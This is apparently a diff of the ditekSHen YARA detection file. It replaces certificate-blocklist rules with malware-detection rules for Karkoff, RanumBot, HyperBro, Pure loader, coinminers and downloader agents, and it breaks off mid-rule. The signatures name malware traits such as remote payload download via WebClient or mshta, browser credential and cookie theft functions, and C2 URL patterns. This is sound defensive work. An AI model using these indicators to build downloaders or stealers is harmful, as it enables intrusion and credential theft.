+		$x2 = "Loginserver8" fullword ascii
+		$x3 = "Proflogger7" fullword ascii
+		$s1 = "Badgeless5" fullword ascii
+		$s2 = "Montebrasite3" fullword ascii
+		$s3 = "Atelomyelia4" fullword ascii
+		$s4 = "Xxencoded5" fullword ascii
+		$s5 = "Garneau2" fullword ascii
+		$s6 = "Hypostasis0" fullword ascii
+		$s7 = "Piarhemia4" fullword ascii
+		$s8 = "Foredestine8" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexander Lomachevsky" and pe.signatures [ i ] . serial == "03:5b:41:76:66:60:b0:8a:af:12:15:36:f0:d8:3d:4d" )
+		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1A041Db92237C18948109789F627B3Cd : FILE
+rule DITEKSHEN_MALWARE_Win_UNK03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown malware"
 		author = "ditekSHen"
-		id = "0a5a6b19-0fbe-5e0c-bfb1-ca201207f6c7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b0711427-b6bf-5e4b-af36-9c752ead4d6c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7308-L7320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5267-L5280"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5e07eb58a68dea062522869c43daeddab666f12b078a4f2ce9aa37885e46cbd"
+		logic_hash = "f1a4be68206628c3addbce8b6bbc1f801e67632d4e6a6af1d45cdad833e9a991"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2315cf802aaf96d11f18766315239016e533bf32"
-		hash1 = "a0338becbfe808bc7655d8b6c825e2e99b37945e5d8fc43a83aec479d64f422d"
-		importance = 20
+
+	strings:
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion" ascii
+		$s2 = "rundll32.exe C:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen %s" ascii
+		$s3 = "%s.jpg" ascii
+		$s4 = "%s\\sz.txt" ascii
+		$s5 = "ChromeSecsv9867%d7.exe" ascii
+		$s6 = "%s\\appl%c.jpg" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amitotic" and pe.signatures [ i ] . serial == "1a:04:1d:b9:22:37:c1:89:48:10:97:89:f6:27:b3:cd" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_06Df5C318759D6Ea9D090Bfb2Faf1D94 : FILE
+rule DITEKSHEN_MALWARE_Win_UNK04 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown malware (proxy tool)"
 		author = "ditekSHen"
-		id = "8c1f226f-6fc0-5136-ac19-7d88d7505a8e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6a178f37-a9fd-5a83-a550-c6333342ac9b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7322-L7334"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5282-L5296"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3be08901a44c1c94cfb93e56075270ed974399ccc0a4dce15299456dad645822"
+		logic_hash = "ba6e5bbc1d094b23e3870af963503d1ccbcd56adc24126b4a38b77d4b88b4b67"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4418e9a7aab0909fa611985804416b1aaf41e175"
-		hash1 = "47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35"
-		importance = 20
+
+	strings:
+		$x1 = "127.0.0.1/%d" fullword ascii
+		$x2 = "SYSTEM\\CurrentControlSet\\SERVICES\\PORTPROXY\\V4TOV4\\TCP" fullword ascii
+		$x3 = "%s rundll32.exe" fullword ascii
+		$s1 = "kxetray.exe" fullword ascii
+		$s2 = "ksafe.exe" fullword ascii
+		$s3 = "Mcshield.exe" fullword ascii
+		$s4 = "Miner.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" )
+		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_330000026551Ae1Bbd005Cbfbd000000000265 : FILE
+rule DITEKSHEN_MALWARE_Win_Karkoff : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Karkoff"
 		author = "ditekSHen"
-		id = "7f86e427-110f-5bcc-bb53-ca534f7444fc"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7d2fe783-18b3-5d84-a9b5-e8e0b5a0db98"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7337-L7351"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5298-L5313"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ae836069665d088c6a309efe5166e260836dce6398c51701b2274515bdaa2cbd"
+		logic_hash = "e9b6ba5be2b3cd0faa898347e57cee5a57b80b19842c3a1ddb42d620307c8b39"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e168609353f30ff2373157b4eb8cd519d07a2bff"
-		hash1 = "a471fdf6b137a6035b2a2746703cd696089940698fd533860d34e71cc6586850"
-		importance = 20
+
+	strings:
+		$x1 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
+		$x2 = "CMD.exe" fullword wide
+		$x3 = "Karkoff.ProjectInstaller.resources" fullword ascii
+		$s1 = /try\shttp(s)?\s(ip|domain)/ fullword wide
+		$s2 = "Reg cleaned!" fullword wide nocase
+		$s3 = "Content-Disposition: form-data; name=\"{1}\"" fullword wide
+		$s4 = "^[A-Fa-f0-9]{8}-([A-Fa-f0-9]{4}-){3}[A-Fa-f0-9]{12}$" fullword wide
+		$s5 = "new backdoor" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . issuer contains "Microsoft Windows Production PCA 2011" and pe.signatures [ i ] . serial == "33:00:00:02:65:51:ae:1b:bd:00:5c:bf:bd:00:00:00:00:02:65" and 1614796238 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 4 of ( $s* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_309368B122Ab63103Dddd4Ad6321A82C : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent09 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known downloader agent"
 		author = "ditekSHen"
-		id = "a9c2fa86-506e-503a-a864-8368f63662c4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "90f71ac7-19d9-5a8e-9830-df2f16e12c9b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7353-L7365"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5315-L5328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37a39d63e2bce6d4ce501e3032ee12fe8c5b39e8d8cb0f3e0c6d0be375bcffc8"
+		logic_hash = "9336507fa4bb9d3a6325d5e9caafc8c4e816a0166fded7d4e53e09a87628bc89"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "1370de077e2ba2065478dee8075b16c0e5a5e862"
-		hash1 = "b7376049b73feb5bc677a02e4040f2ec7e7302456db9eac35c71072dd95557eb"
-		importance = 20
+
+	strings:
+		$h1 = "//:ptth" ascii wide nocase
+		$h2 = "//:sptth" ascii wide nocase
+		$s1 = "DownloadString" fullword ascii wide
+		$s2 = "StrReverse" fullword ascii wide
+		$s3 = "FromBase64String" fullword ascii wide
+		$s4 = "WebClient" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Accounting Limited" and pe.signatures [ i ] . serial == "30:93:68:b1:22:ab:63:10:3d:dd:d4:ad:63:21:a8:2c" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $h* ) and all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_19F613Cf951D49814250701037442Ee2 : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminingbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining bot"
 		author = "ditekSHen"
-		id = "780c515e-811c-5f44-97a2-9ed93a7d9d89"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "df15bfbd-f531-5eaa-b160-ad8a1fbe992f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7367-L7384"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5330-L5343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ea5f770ddbb7dba836049bec0c7b73cd5bc6a87514f8ea00288cb9d52d17651"
+		logic_hash = "a307a6c9184e8f4068cfa89a8432ae017c8aab10b706ba065051f8749860c15c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint1 = "6feab07fa782fc7fbddde8465815f4d04d79ad97"
-		thumbprint2 = "41aaafa56a30badb291e96d31ed15a9343ba7ed3"
-		hash1 = "9629cae6d009dadc60e49f5b4a492bd1169d93f17afa76bee27c37be5bca3015"
-		hash2 = "3b3281feef6d8e0eda2ab7232bd93f7c747bee143c2dfce15d23a1869bf0eddf"
-		importance = 20
+
+	strings:
+		$s1 = "FullScreenDetect" fullword ascii
+		$s2 = "GetChildProcesses" fullword ascii
+		$s3 = "HideBotPath" fullword ascii
+		$s4 = "Inject" fullword ascii
+		$s5 = "DownloadFile" fullword ascii
+		$s6 = "/Data/GetUpdateInfo" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cooler Master" and ( pe.signatures [ i ] . serial == "19:f6:13:cf:95:1d:49:81:42:50:70:10:37:44:2e:e2" or pe.signatures [ i ] . serial == "6b:e8:ee:f0:82:a4:f5:96:4c:75:0b:c0:07:24:f6:4a" ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2D8Cfcf04209Dc7F771D8D18E462C35A : FILE
+rule DITEKSHEN_MALWARE_Win_Fyanti : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for FYAnti third-stage loader DLLs"
 		author = "ditekSHen"
-		id = "6b2b25af-dae5-5055-851d-e515f6beee58"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7a1f913c-d83f-50e9-943c-246c4c71c654"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7386-L7398"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5345-L5351"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e7eee6a6593c231c193145eeefd03a0f32c1d8cc103c97cfa26b5af7363c9b08"
+		logic_hash = "baaeef0b1452d7ea41ffaaff592cac2c5e16f921dbbfb3a300a63e69f134e9d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a9c61e299634ba01e269239de322fb85e2da006b"
-		hash1 = "af27173ed576215bb06dab3a1526992ee1f8bd358a92d63ad0cfbc0325c70acf"
-		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "FuckYouAnti" )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_06De439Ba2Df4Dcd8240C211D60Cdf5E : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent10 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known downloader agent"
 		author = "ditekSHen"
-		id = "90623074-58ac-51fd-9b80-881d3187dc74"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b5807adf-9d15-5e08-97fb-a529acb1c1eb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7400-L7412"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5353-L5364"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2847853e2e9cc9e6909871b3f8e6de399fb76353e997b084c92dbcfe6c1a48f"
+		logic_hash = "74647b39331727000608bc89b30189d802e62d59876659d4477deb4da2fcfe13"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
-		thumbprint = "2650a1205bd7720381c00bdee5aede0ee333dc13"
-		hash1 = "e3bc81a59fc45dfdfcc57b0078437061cb8c3396e1d593fcf187e3cdf0373ed1"
-		importance = 20
+
+	strings:
+		$s1 = "powershell.exe" ascii wide nocase
+		$s2 = ".DownloadFile(" ascii wide nocase
+		$s3 = "_UseShellExecute" ascii wide nocase
+		$s4 = "_CreateNoWindow" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microleaves LTD" and pe.signatures [ i ] . serial == "06:de:43:9b:a2:df:4d:cd:82:40:c2:11:d6:0c:df:5e" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F454F2Fdc800B3454059D8889Bd73D67 : FILE
+rule DITEKSHEN_MALWARE_Win_Pureloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Pure loader / injector"
 		author = "ditekSHen"
-		id = "277ac503-91c4-5266-b8a4-c01a48b8df4d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ad44a12a-4ac7-5cc7-92ab-13c23514de69"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7414-L7429"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5366-L5382"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "91b33a3e915a007d00482905471e124045a373fef9c8b0fe9a987196d2ec013a"
+		logic_hash = "1f0bd20e769ea79d28d6e60ca06aa8aa2b3436426cfe0cd4f2023a08236875cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2b560fabc34e0db81dae1443b1c4929eef820266"
-		hash1 = "e58b80e4738dc03f5aa82d3a40a6d2ace0d7c7cfd651f1dd10df76d43d8c0eb3"
-		importance = 20
+
+	strings:
+		$s1 = "InvokeMember" fullword wide
+		$s2 = "ConcatProducer" fullword wide
+		$s3 = ".Classes.Resolver" wide
+		$s4 = "get_DLL" fullword ascii
+		$s5 = "BufferedStream" fullword ascii
+		$s6 = "GZipStream" fullword ascii
+		$s7 = "MemoryStream" fullword ascii
+		$s8 = "Decompress" fullword ascii
+		$s9 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAUTY CORP SRL" and ( pe.signatures [ i ] . serial == "f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" or pe.signatures [ i ] . serial == "00:f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" ) )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3Afe693728F8406054A613F6736F89E3 : FILE
+rule DITEKSHEN_MALWARE_Win_VBS_Dlagent01
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects VBS MSHTA downloader"
 		author = "ditekSHen"
-		id = "64c4157e-2183-5f41-b938-df29e210ee80"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "447ea323-ecab-5f6b-b13e-0690254c754e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7431-L7443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5384-L5395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6993a13546a1eff8a4f770f224a14bffe7e3393f628337cff27cbf57ebab2a65"
+		logic_hash = "0e47839a55773764aca0aebcf1078c06c729b86d1e2f18d7d64e3bb11e87f3eb"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "89528e9005a635bcee8da5539e71c5fc4f839f50"
-		hash1 = "d98bdf3508763fe0df177ef696f5bf8de7ff7c7dc68bb04a14a95ec28528c3f9"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "llehS.tpircsW" ascii
+		$s2 = ".Run" ascii
+		$s3 = "mshta http" ascii nocase
+		$s4 = "StrReverse" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROB ALDERMAN FITNESS LIMITED" and pe.signatures [ i ] . serial == "3a:fe:69:37:28:f8:40:60:54:a6:13:f6:73:6f:89:e3" )
+		all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Fd7F9Cac1E9Ce71Ac757F93266E3B13 : FILE
+rule DITEKSHEN_MALWARE_Win_Ranumbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RanumBot / Windigo / GoStealer"
 		author = "ditekSHen"
-		id = "6021f566-e297-5af4-b692-663480091296"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "26a0832e-8a39-5a0e-bd39-710744212c16"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7445-L7457"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5397-L5430"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "319f858a15f8752d7637ab7036ed89b17c501c2422769339578e685fe6a57eea"
+		logic_hash = "a9c32445e62d072e4184d25497696ef6225edb176dc7a9743a54194d4ddb4b0c"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "af2779ceb127caa6c22232ad359888a0a71ce221"
-		hash1 = "7c28b994aeb3a85e37225cc20bae2232f97e23f115c2a409da31f353140c631e"
-		importance = 20
+
+	strings:
+		$f1 = "main.addSchedulerTaskSSH" fullword ascii
+		$f2 = "main.attackRouter" fullword ascii
+		$f3 = "main.decryptPassword" fullword ascii
+		$f4 = "main.handleScanRequest" fullword ascii
+		$f5 = "main.scanNetwork" fullword ascii
+		$f6 = "main.extractCredentials" fullword ascii
+		$s1 = "H_T= H_a= H_g= MB,  W_a= and  h_a= h_g= h_t= max= ptr  siz= tab= top= u_a= u_g=%s/16%s:%d%s:22+0330+0430+0530+0545+0630+0845+10" ascii
+		$s2 = "<== as  at  fp= is  lr: of  on  pc= sp: sp=) = ) m=+Inf, n -Inf00%x112212343125: p=ABRTACDTACSTAEDTAESTAKDTAKSTALRMAWSTAhomAtoiCESTChamDashEESTGOGCJulyJuneKILLLEAFLisuMiaoModiNZDTNZSTNewaPIPEQUITSASTSEGVTERMThai" ascii
+		$s3 = "W*struct { P *big.Int; Q *big.Int; G *big.Int; Y *big.Int; Rest []uint8 \"ssh:\\\"rest\\\"\" }" ascii
+		$s4 = "policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write" ascii
+		$s5 = "/Users/alexander/go/src/mikrotik/winbox.go" ascii
+		$xf1 = "main.readConfig" fullword ascii
+		$xf2 = "main.ensureRunningAsUser" fullword ascii
+		$xf3 = "main.configRegPath" fullword ascii
+		$xf4 = "main.oldConfigRegPath" fullword ascii
+		$uf1 = "main.locateChrome" fullword ascii
+		$uf2 = "main.decryptAndUploadProfile" fullword ascii
+		$uf3 = "main.decryptCookies" fullword ascii
+		$uf4 = "main.extractPasswords" fullword ascii
+		$uf5 = "main.getFirefoxProfile" fullword ascii
+		$uf6 = "main.postBrowsersData" fullword ascii
+		$uf7 = "main.uploadFirefoxProfile" fullword ascii
+		$uf8 = "main.zipFirefoxProfile" fullword ascii
+		$uf9 = /main\.detect(Browsers|Chrome|Coccoc|Edge|Firefox|InternetExplorer|Opera|Yandex)/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9D\\x92\\xE5\\xB2\\x9B\\xE4\\xB8\\x89\\xE5\\x96\\x9C\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0f:d7:f9:ca:c1:e9:ce:71:ac:75:7f:93:26:6e:3b:13" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 4 of ( $s* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) or ( all of ( $xf* ) and 1 of ( $uf* ) ) or 6 of ( $uf* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Fbf16A33D26390A15F046C310030Cf0 : FILE
+rule DITEKSHEN_MALWARE_Win_Dllhijacker01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for VSNTAR21 / DllHijacker01 IronTiger / LuckyMouse / APT27 malware"
 		author = "ditekSHen"
-		id = "6c010106-141d-5121-9594-73edc872a381"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0a858058-310a-5b1c-a6fe-abdec7b25abe"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7459-L7471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5432-L5448"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc68fe14ec70de74a6dae7891dfbb82ee7974f37469cfa72d735e70e9194c405"
+		logic_hash = "48535c0bb5342e2f91ac9d015c761d8d543b122dd3cc08b7029631fcf3037bfb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "61f422db86bbc5093b1466a281f13346f8d81792"
-		hash1 = "f45e5f160a6de454d1db21b599843637103506545183a30053d03b609f92bbdc"
-		importance = 20
+
+	strings:
+		$s1 = "libvlc_add_intf" fullword ascii
+		$s2 = "libvlc_dllonexit" fullword ascii
+		$s3 = "libvlc_getmainargs" fullword ascii
+		$s4 = "libvlc_initenv" fullword ascii
+		$s5 = "libvlc_set_app_id" fullword ascii
+		$s6 = "libvlc_set_app_type" fullword ascii
+		$s7 = "libvlc_set_user_agent" fullword ascii
+		$s8 = "libvlc_wait" fullword ascii
+		$s9 = "dll.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_292Eb1133507F42E6F36C5549C189D5E : FILE
+rule DITEKSHEN_MALWARE_Win_Hyperbro02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HyperBro IronTiger / LuckyMouse / APT27 malware"
 		author = "ditekSHen"
-		id = "60d3cc6e-bf58-55ae-a13b-0e22ecc8d5cd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1880afd7-ca06-5b43-af8f-e791ded0d7d8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7473-L7485"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5450-L5474"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "456a09b1939d3f60e6ef735631eb681a9d15ea573552672fd14b19f60e8d8c73"
+		logic_hash = "ca4ee116516549fc42f7e32b3c24d631b7f2c638efbde5c07227358e78fd6f35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "48c32548ff651e2aac12716efb448f5583577e35"
-		hash1 = "f0b3b36086e58964bf4b9d655568ab5c7f798bd89e7a8581069e65f8189c0b79"
-		importance = 20
+
+	strings:
+		$s1 = "\\cmd.exe /A" fullword wide
+		$s2 = "C:\\windows\\explorer.exe" fullword wide
+		$s3 = "\\\\.\\pipe\\testpipe" fullword wide
+		$s4 = "Elevation:Administrator!new:{" wide
+		$s5 = "log.log" fullword wide
+		$s6 = "%s\\%d.exe" fullword wide
+		$s7 = ".?AVTPipeProtocol@@" fullword ascii
+		$s8 = ".?AVTCaptureMgr@@" fullword ascii
+		$s9 = "system-%d" fullword wide
+		$s10 = "[test] %02d:%02d:%02d:%03d %s" fullword wide
+		$s11 = "\\..\\data.dat" fullword wide
+		$s12 = "\\..\\config.ini" fullword wide
+		$s13 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 77 00 6f 00 72 00 6b 00 65 00 72 00 }
+		$s14 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 64 00 61 00 65 00 6d 00 6f 00 6e 00 }
+		$cnc1 = "https://%s:%d/ajax" fullword wide
